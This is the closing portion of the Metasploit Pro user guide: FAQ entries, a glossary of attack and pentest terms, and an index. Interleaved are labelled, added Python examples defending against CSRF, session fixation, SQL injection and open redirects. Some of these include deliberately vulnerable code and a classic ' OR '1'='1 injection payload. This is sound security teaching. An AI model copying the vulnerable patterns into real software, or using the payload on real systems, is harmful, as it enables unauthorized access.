Why did Metasploit Pro not import all vulnerabilities from my Nexpose site?
Metasploit Pro only imports vulnerabilities for which it has correlating exploit modules. If Metasploit Pro does not have a matching exploit in its database, it will not import the vulnerability from a site.

How can I view the attack plan without actually running exploits?
You can select the Dry run option on the Exploit tab. Metasploit Pro creates the attack plan and prints it in the Task Log.


Glossary
Administrator
An account that provides unrestricted access to manage user accounts, install updates, and configure global settings in Metasploit Pro.

Asset
A Nexpose term for a host or target that Nexpose scans for vulnerabilities.

Asset Group
A Nexpose term for a collection of assets.

Auxiliary Module
Any module that does not deliver a payload and does not obtain a shell on a remote target. An auxiliary module provides additional support for tasks that you need to perform a penetration test, such as scanning and fuzzing.

Berkeley Packet Filter


A packet filter that provides a raw interface to the data link layer and enables a very granular level of packet filtering.

Bind Shell Payload


Attaches a listener on the exploited system and waits for the attacking machine to connect to the listener.

Bruteforce
A password cracking method that attempts a large number of user name and password combinations until it successfully obtains access to a target.

Campaign
A logical grouping of components that you need to perform a social engineering attack.

Client-Side Exploit
An exploit that attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. A client-side exploit is different from a traditional exploit because it requires the victim to initiate the connection between their machine and an attacking machine.

Command Injection (CMDi)


An attack method that injects and runs commands in a compromised application. Most command injection attacks take advantage of unvalidated user input, which enables an attacker to append a command sequence or escape string to execute arbitrary commands. If a command injection attack is successful, the attacker can use the exploited application as a pseudo shell to execute malicious code.

Credentials
A user name and password combination that provides access to systems and accounts.

Cross-site Request Forgery (CSRF)


An attack method that uses a victim's active session to exploit the victim's identity and privileges. During a Cross-site Request Forgery attack, an attacker sends a victim a URL to a web page that contains a link, form button, or some JavaScript that performs an action. When the action is requested, it executes on the attacker's behalf with the victim's privileges. For example, an attacker may force a victim to unknowingly make purchases, modify account information, transfer funds, or perform any other action that the web application allows.
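
The session-bound token check that defends against this, as an added example that is not part of the original guide or of Metasploit Pro; the server secret, the session identifiers and the request dictionaries are constructed for the demonstration:

```python
import hashlib
import hmac
import secrets

# Constructed: a per-deployment secret. A real server loads this from
# configuration rather than generating it at import time.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Token bound to one session: HMAC(secret, session id).

    A page on the attacker's site can make the victim's browser send the
    session cookie automatically, but it cannot read this token, so a
    forged request cannot carry it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, submitted_token):
    """Constant-time comparison of the submitted token with the expected one."""
    if not submitted_token:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted_token)


def transfer_funds(request, session_id):
    """Gate a state-changing action.

    `request` is a constructed dict with 'method' and 'form' keys; returns
    True only when the request may proceed.
    """
    if request["method"] != "POST":
        # A state change reachable via GET can be triggered by a plain link
        # or image tag, token or not.
        return False
    return verify_csrf(session_id, request["form"].get("csrf_token"))


def demo():
    """Constructed requests against the victim's session: one legitimate, three forged."""
    victim = "sess-victim"
    legit = {"method": "POST",
             "form": {"csrf_token": csrf_token(victim), "amount": "100"}}
    # Forged from another origin: the cookie rides along, the token does not.
    no_token = {"method": "POST", "form": {"amount": "100"}}
    # A token minted for the attacker's own session does not verify for the victim's.
    wrong_session = {"method": "POST",
                     "form": {"csrf_token": csrf_token("sess-attacker"),
                              "amount": "100"}}
    # Even a valid token is rejected when the action arrives via GET.
    via_get = {"method": "GET", "form": {"csrf_token": csrf_token(victim)}}
    return (transfer_funds(legit, victim),
            transfer_funds(no_token, victim),
            transfer_funds(wrong_session, victim),
            transfer_funds(via_get, victim))


if __name__ == "__main__":
    print(demo())  # (True, False, False, False)
```

The token is derived from the session identifier rather than stored, so no extra server-side state is needed; what matters is that it is only ever delivered inside pages served to the authenticated user, never in a cookie.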

Cross-Site Scripting (XSS)


An attack method that injects a client-side script to exploit web applications and web pages. Most cross-site scripting attacks execute malicious code when a target visits an infected web page. Typically, the infected web page redirects the victim to a spoofed web page, which injects malicious code that enables the attacker to take over the session.

Data Exfiltration
A method of extracting data, such as simple file transfers that use netcat or ssh to perform a secure copy.


Discovery Scan
The internal Metasploit scanner that gathers port, service, and system information. It runs additional scanner modules based on the services that it identifies to gather more information about the targets.

Direct Object Reference


An attack method that exploits a vulnerability in a web application that exposes an internal implementation object, such as a database record or file, to a user. Common examples of direct object reference vulnerabilities include open redirects and directory traversals.

Egress Target
An external server hosted by Rapid7 that acts as a scan target. You can run the Firewall Egress Testing MetaModule against this target to identify open outbound ports from an internal host.

Exploit
An attack that leverages a vulnerability to deliver a payload to a target system.

File Format Exploit


An attack that takes advantage of a vulnerability in the way that an application processes data in a particular kind of file format, such as PDF, DOC, or JPEG. A file format exploit can run when a human target opens an attachment that contains the exploit.

Firewall Egress Testing MetaModule


A MetaModule that runs a full Nmap SYN scan against an external server hosted by Rapid7 to discover outbound ports on a firewall that an attacker can use to exfiltrate information.

Global Settings
Options that apply to all projects.

Host
A computer that is part of a network.

Host Comments
A tool that documents observations and information about a host.


Host Tags
A unique identifier used to categorize and group hosts.

Human Target
A person who is a recipient of a social engineering attack.

John the Ripper


A tool that you can use to crack password hashes in order to recover weak passwords.

Keyword Expression
A combination of a keyword definitive and a keyword that can be used to search for hosts and modules.

Known Credentials Intrusion MetaModule


A MetaModule that systematically logs in to hosts and services using the known credentials for the project and attempts to open as many shells as possible.

Local File Inclusion (LFI)


An attack method that uses an include method to inject local files from the exploited server. LFI attacks typically exploit vulnerable parameters that enable an attacker to include code that is already hosted on the server. LFI attacks enable the attacker to gather user names, gather information from the log files, and remotely execute commands on the exploited server.

Listener
A process that runs on an exploited machine and waits for a connection for a bind shell payload.

Lockout Risk
The likelihood that a service enforces an account lockout.

Macro
A script that automatically runs a set of post-exploitation modules.


MetaModule
A feature that provides a wizard-like interface that guides you through the configuration of a module. Each MetaModule focuses on a single penetration testing task, such as firewall egress testing, credential testing, or passive network discovery scanning.

Metasploit Framework
An open source penetration testing and development platform that provides access to the latest exploit code for various applications, operating systems, and platforms.

Module
A standalone piece of code that runs tasks and exploits.

Module Ranking
A rank that indicates the reliability and stability of an exploit. The higher the ranking, the less likely the exploit will crash a service. Use the module ranking to determine whether or not the module can reliably identify a target version.

Nexpose
A vulnerability analysis tool that automates the detection of vulnerabilities on an asset.

Nexpose Push
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.

Notification Center
The notification system for Metasploit that alerts you when a task completes or when a software update is available.

Packet Capture
A process that makes copies of packets off the wire.

Passive Network Discovery MetaModule


A MetaModule that passively scans traffic to discover hosts on a local network.


Pass the Hash


A technique that uses the NTLM or LM hash to authenticate to a remote machine or service without the actual password.

Pass the Hash MetaModule


A MetaModule that attempts to log in to as many hosts as possible with a recovered Windows SMB hash and reports the hosts to which it was able to successfully authenticate.

Password Cracking
The process of reverting a password hash to plaintext.

Password List
A dictionary or list of common passwords. A password cracker hashes each word in the password list until it finds a matching hash.

Payload
The code that executes on the target system after an exploit successfully executes.

Persistent Listener
A process that runs on the Metasploit machine and waits for connect backs for reverse payloads. A persistent listener is another term for a handler.

Phishing
Phishing is a social engineering technique that uses e-mail to acquire sensitive information, such as user names, passwords, and credit card information, from a human target.

Portable File
A file that can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key.

Post-Exploitation
The phase that occurs after exploitation. During post-exploitation, the data on the exploited machine is analyzed to determine the value and usefulness of the compromised host. Post-exploitation tasks include identifying configuration settings and mapping the network topology.


Project
A container for the targets, tasks, reports, and data that are part of a penetration test.

Proxy Pivot
An attack method that uses a compromised system to attack other systems on the same network.

Publicly Writable Directory


A directory that has write permissions that grants all users the ability to modify the directory and the files that it contains, including creating, deleting, and renaming files.

Report
A document that provides a detailed account of the information gathered in a project.

Reverse Shell Payload


A payload that creates a connection from the target machine and returns a command prompt back to the attacker.

Remote File Inclusion (RFI)


An attack method that uses server-side scripts to exploit vulnerable web applications and enables the attacker to upload a remote file to the victim's server. RFI attacks typically exploit vulnerable include functions to link to remote scripts. These scripts will commonly allow an attacker to execute shell commands that enable them to upload files, create directories, and modify websites.

Scan Data
The host and vulnerability data imported from an external source, such as a vulnerability scanner like Nexpose or Nessus.

Session Fixation
An attack method that enables an attacker to hijack an established user session by forcing the session identifier (ID) to a specific value. During a session fixation attack, the attacker sends a victim a URL that contains the fixed session ID, which forces the victim's browser to use the selected session. When the victim clicks on the URL, the web application establishes that a session already exists for the user and does not create a new session. Therefore, when the victim logs into the web application, the attacker is able to access the account using the same session ID.
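
The mitigation the definition implies, retiring the pre-authentication session identifier and issuing a fresh one at login, as an added example (not code from the guide or from Metasploit Pro); the in-memory store and the attacker-chosen identifier are constructed for the demonstration:

```python
import secrets


class SessionStore:
    """Constructed in-memory session store, not Metasploit Pro code."""

    def __init__(self):
        self._sessions = {}  # session id -> {"user": name or None}

    def new_session(self, session_id=None):
        # Accepting a client-supplied id models the fixation vector: the
        # attacker plants this id in the URL the victim clicks.
        sid = session_id or secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login_vulnerable(self, sid, user):
        # Keeps the pre-authentication id, so whoever chose it now holds an
        # authenticated session.
        self._sessions[sid]["user"] = user
        return sid

    def login_hardened(self, sid, user):
        # Retire the pre-authentication id and issue a fresh, random one:
        # the id the attacker knows never becomes an authenticated session.
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def user_for(self, sid):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None


def demo():
    """Run the fixation scenario against both login variants."""
    fixed = "attacker-chosen-id"  # constructed: the id planted in the victim's URL

    vulnerable = SessionStore()
    vulnerable.new_session(fixed)
    vulnerable.login_vulnerable(fixed, "victim")
    attacker_sees_vulnerable = vulnerable.user_for(fixed)  # "victim"

    hardened = SessionStore()
    hardened.new_session(fixed)
    victim_sid = hardened.login_hardened(fixed, "victim")
    attacker_sees_hardened = hardened.user_for(fixed)  # None: the fixed id is gone
    return (attacker_sees_vulnerable, attacker_sees_hardened,
            hardened.user_for(victim_sid), victim_sid != fixed)


if __name__ == "__main__":
    print(demo())  # ('victim', None, 'victim', True)
```

Rotating the identifier at every privilege change (login, role elevation) is the general rule; the store above also shows why a server should never adopt an identifier it did not itself issue.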


Shell
An interface that can be used to interact with a system.

Single Testing Password MetaModule


A MetaModule that uses a known credential pair to log in to a range of hosts and services and reports on any hosts to which it was able to successfully authenticate.

Site
A Nexpose term for a collection of assets and asset groups.

Sites
Refers to a website, or a collection of web pages, that is defined by a fully qualified domain name or IP address. A site can also refer to a web application.

SQL Injection (SQLi)


An attack method that exploits user input vulnerabilities to pass SQL queries through a web application to the database. The database executes the SQL queries, which typically enables the attacker to modify or gain access to the database.
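
A login query built by string concatenation beside its parameterized form, as an added example that is not part of the original guide or of Metasploit Pro; the SQLite table and the credentials in it are constructed sample data:

```python
import sqlite3


def make_db():
    """Constructed sample data: a toy user table in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    # The query is assembled from the raw input, so a quote in the input
    # closes the string literal and the rest is parsed as SQL syntax.
    query = ("SELECT COUNT(*) FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def login_hardened(conn, name, password):
    # Parameterized query: the statement is fixed and the driver passes the
    # values separately, so quotes in the input stay data, never syntax.
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone()[0] > 0


def demo():
    """Try the textbook tautology against both variants."""
    conn = make_db()
    tautology = "' OR '1'='1"  # constructed input: turns the WHERE clause into ... OR '1'='1'
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "alice", tautology),
        "hardened_bypassed": login_hardened(conn, "alice", tautology),
        "hardened_valid": login_hardened(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
    # {'vulnerable_bypassed': True, 'hardened_bypassed': False, 'hardened_valid': True}
```

The defensive point is that escaping is not the fix; binding parameters is, because the database receives the statement and the values on separate channels.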

SSH Key Testing MetaModule


A MetaModule that attempts to log in to hosts with a recovered SSH key and records each successful login.

Target
A target can refer to the network, hosts, or type of systems that you want to exploit.

Target List
A list that defines the recipients and their e-mail addresses that will receive a phishing e-mail or some form of social engineering attack.

Task
An action that the system can perform, such as a scan, bruteforce attack, smart exploit, report generation, or data collection.


Task Chain
A series of tasks that are linked together.

Task Schedule
The recurrence settings for a task chain. The task schedule determines the frequency at which the task chain runs.

Template
A reusable HTML shell that contains boilerplate and is used to quickly generate web page or e-mail content for a campaign.

Transport Layer Security (TLS)

An Internet protocol that enables servers and clients that support Transport Layer Security or Secure Sockets Layer (SSL) to transmit and receive encrypted data securely. TLS/SSL prevents a third party from monitoring or altering communication between a server and a client.

Unauthorized Access
Refers to the ability to obtain entry to system and network resources without valid permissions. An attacker can exploit vulnerabilities in authentication services, FTP services, and web services to obtain unauthorized access in order to do things like modify security policies, steal user names and passwords, and escalate privileges.

Unvalidated Redirect
A request that accepts untrusted, unvalidated user-supplied parameters to specify the redirect target. If the application does not validate the input value, the victim can be redirected to a malicious URL. This attack method is typically used in phishing attacks to get victims to unknowingly visit a malicious site. To exploit an unvalidated redirect, an attacker may craft a URL that uses the domain of a trusted site, such as http://www.yoursite.com. However, the URL may include a redirect function, such as http://www.yoursite.com/redirect.aspx?url=http://www.mysite.com, that sends the victim to a malicious site designated by the attacker.
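
An allow-list check for a redirect parameter like the one above, as an added example that is not part of the original guide or of Metasploit Pro. It treats the page's example domain www.yoursite.com as the trusted host, and it goes a little beyond the definition by also rejecting scheme-relative (//host) and credential-prefixed (user@host) forms that superficially look like the trusted site:

```python
from urllib.parse import urlsplit

# Assumption: the application's own host names; www.yoursite.com is the
# page's example domain.
TRUSTED_HOSTS = {"www.yoursite.com"}


def safe_redirect_target(url, default="/"):
    """Return `url` if it stays on our own site, otherwise `default`.

    Called on the value of a redirect parameter before issuing the 3xx.
    """
    if not url:
        return default
    # Whitespace and control characters are parsed leniently by some
    # browsers; refuse them rather than guess.
    if any(c.isspace() or ord(c) < 32 for c in url):
        return default
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        # A site-relative path must begin with exactly one '/'. '//evil' is
        # scheme-relative and leaves the site; some browsers treat a leading
        # '/\' the same way.
        if url.startswith("/") and not url.startswith("//") and not url.startswith("/\\"):
            return url
        return default
    if parts.scheme not in ("http", "https"):
        return default  # javascript:, data:, and friends
    # .hostname is lowercased and has userinfo and port stripped, so
    # http://www.yoursite.com@www.mysite.com/ resolves to www.mysite.com.
    if parts.hostname in TRUSTED_HOSTS:
        return url
    return default


if __name__ == "__main__":
    for candidate in ("/account",
                      "http://www.yoursite.com/account",
                      "http://www.mysite.com",
                      "//www.mysite.com/",
                      "http://www.yoursite.com.mysite.com/",
                      "http://www.yoursite.com@www.mysite.com/",
                      "javascript:alert(1)"):
        print(repr(candidate), "->", safe_redirect_target(candidate))
```

Comparing the parsed host name against an allow list, rather than checking that the string "starts with" the trusted domain, is what defeats the look-alike forms; a prefix check would accept every one of the rejected inputs above.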

Vulnerable Version
Refers to a version of an application or software that has known security vulnerabilities.


vhost
Refers to the fully qualified domain name of a virtual host or server. Typically, vhosts are devices that can be accessed remotely by users to host data or utilize software services.

VPN Pivot
An attack method that uses the compromised system to route network traffic.

Vulnerability
A security flaw or weakness in an application or system that enables an attacker to compromise the target system.

Vulnerability Exception
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability as an accepted risk. It also refers to a vulnerability found by Nexpose that Metasploit Pro was unable to exploit.

Vulnerability Exception Reason


The reason why a vulnerability exists and why it should be excluded from the vulnerability assessment.

Vulnerability Result Code


The reason why a module did not run successfully.

Vulnerable Target
A potentially exploitable machine.

Web Audit
A feature that performs vulnerability checks for XSS, LFI, RFI, and SQLi flaws.

Web Crawl
A feature that recursively parses a website or namespace for hyperlinks that point to other web pages and follows the links to those other pages.


Web Exploit
A feature that matches exploits to known web vulnerabilities to create an attack plan. Web exploit runs the attack plan after it has been created and attempts to exploit the identified vulnerabilities.

Web Page
Refers to an HTML document that resides on the World Wide Web.

Web Scan
A feature that analyzes web application configurations and security. A web scan crawls websites, audits them for misconfigurations and common vulnerability types, such as XSS, LFI, RFI, and SQLi vulnerabilities, and exploits the identified vulnerabilities.

Web Vulnerability (WebVuln)


A security weakness or flaw that enables an attacker to compromise a web application. Most web vulnerabilities are caused by unvalidated user input, cross-site scripting, and injection flaws. These security flaws provide attackers with an opportunity to leverage the vulnerability to gain access to the web application to run arbitrary code.


Index

active session 329-330
Acunetix XML 129
administrator account 30
Amap Log 129
AppScan XML 129
asset 198
asset group 198, 212
authenticated web application scans 298
authentication note 331
authentication notes 218
automated exploit 235
automatic update 39
auxiliary module 118
Basic 298
bind shell payload 4
Browser Autopwn 343
bruteforce attack 218
Burp Session XML 129
campaign 349
    create 351
    definition 343
    restrictions 349
campaign component 353
Campaign Dashboard 346
campaign findings 353
campaign reset 352
campaign state 349
campaign widget 347
click tracking 343
client-side exploit 339
command shell 330
Core Impact XML 130
custom scan template 205
Digest 298
Discovery Scan 4, 126-127, 135
e-mail alert 390
e-mail notification 355
e-mail template
    create 378
    definition 343
executable
    definition 343
    generate 383
exploit 235
Exploit 5, 235
exploit database 117
file format exploit
    about 339, 385
    definition 343
    download 386
    generate 385
file system 334
Foundstone Network Inventory XML 129
Framework log 52
global settings 37
H.323 systems 136
host comment 112
    add 112
host comments
    update 113
Host Details page 215
host tag 320
HTTP payloads 37
HTTPS payloads 38
human target 373
    definition 344
    text file 373
import 150
import data 204
IPv6 132
Java Signed Applet 339
John the Ripper 218
keyboard shortcut 27
keyword tags 121
Libcap 129
license key 44, 46
    revert 48
    update 46
license key activation 45
License log 52
listener 237, 240
log files 52
LPORT 369
mail server 359
mail server configuration 359
malicious file 379
    serving 380
malicious file attachment 379
manual exploit 235
Metasploit Framework 3
Metasploit Pro 2
Meterpreter 5, 331
Microsoft MBSA SecScan XML 129
module 3, 5, 237
    excluded 118
module rankings 124
module search 121, 238
module statistics 123
modules
    about 117
nCircle IP360 129
Negotiate 298
Nessus NBE 129
Nessus XML 129
NetSparker XML 129
network range 104
network range restriction 106
Nexpose 198-200
NeXpose 129
Nexpose asset group 212
Nexpose console 200
Nexpose raw XML 204
NeXpose Raw XML 129
Nexpose simple XML 204
NeXpose Simple XML 129
Nmap 138
Nmap command line 138
Nmap XML 129
non-administrator 30
NOP generator 118
NTLM 298
offline activation 47
offline update 58
pass the hash 207
Password 32
payload 5, 118
phishing 338, 387
phishing attack 344, 388
phishing campaign 387
Phishing Campaign Wizard 17
phishing e-mail
    create 389
portable file 369
    about 340
    create 369
    download 371
Portable File 344
ports 128
post-exploitation module 118
Pro service error log 52
Production log 52
project 5, 97
    create 98
    view all 99
project members 109
project owner 102, 111
proof text 317
proxy pivot 332
purge 206
PWDump Export 129
Qualys Asset XML 129
Qualys Scan XML 129
Quick PenTest wizard 9
redirect page 368
resource file 344
restart services
    Linux 50
    Windows 50
result code 215
Retina XML 129
reverse shell 6
scan data 129
scan template 198
session clean up 392
shell 6
site 198
SMTP settings 40, 361
social engineering 336
    definition 344
Social Engineering Campaign Details Report 393
    generate 404
Spiceworks Inventory Summary CSV 130
SSL 299
tagged assets 208
target list 372, 374
    CSV 373
    definition 344
    import 374
    spreadsheet 374
target profile 10
task 6
task chain 408
team collaboration 109
template 375
Thin log 52
time zone 35
tracking GIF 344
tracking link 345
tracking string
    definition 345
updates 57, 61
URL black list 298
USB key 383
user account 30, 34
user name requirements 36
virtual interfaces 333
visit
    definition 345
VM servers 133
VNC session 333
VPN pivot 332
vulnerability 6
vulnerability exception 187, 210
Web Application Assessment Report 305
web application exploit 303
web application test 297
Web Application Test Wizard 19
web application testing 19
web audit 301-302
web page 362
web page template 376
    create 375-376
web scan 296
Web server access log 52
Web server error log 52
web template 375
    definition 345
wizard 9, 17
word list 232
word lists 233
